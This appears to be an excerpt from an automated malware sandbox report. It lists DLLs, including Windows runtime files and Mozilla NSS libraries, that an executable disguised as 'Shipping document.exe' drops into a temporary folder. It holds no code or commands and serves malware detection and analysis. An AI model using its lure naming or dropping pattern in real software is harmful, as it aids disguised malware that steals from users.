            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-libraryloader-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-conio-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-debug-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\mozglue.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-timezone-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\softokn3.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\ucrtbase.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-process-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-filesystem-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-console-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-string-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-interlocked-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-synch-l1-2-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-heap-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-locale-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-math-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-string-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-processenvironment-l1-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\vcruntime140.dll
            Source: C:\Users\user\Desktop\Shipping document.exe File created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-file-l2-1-0.dll
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\msvcp140.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-file-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\freebl3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\nssdbm3.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-core-file-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\Desktop\Shipping document.exeFile created: C:\Users\user\AppData\Local\Temp\ED30E097\api-ms-win-crt-private-l1-1-0.dllJump to dropped file
Source: C:\Users\user\Desktop\Shipping document.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion: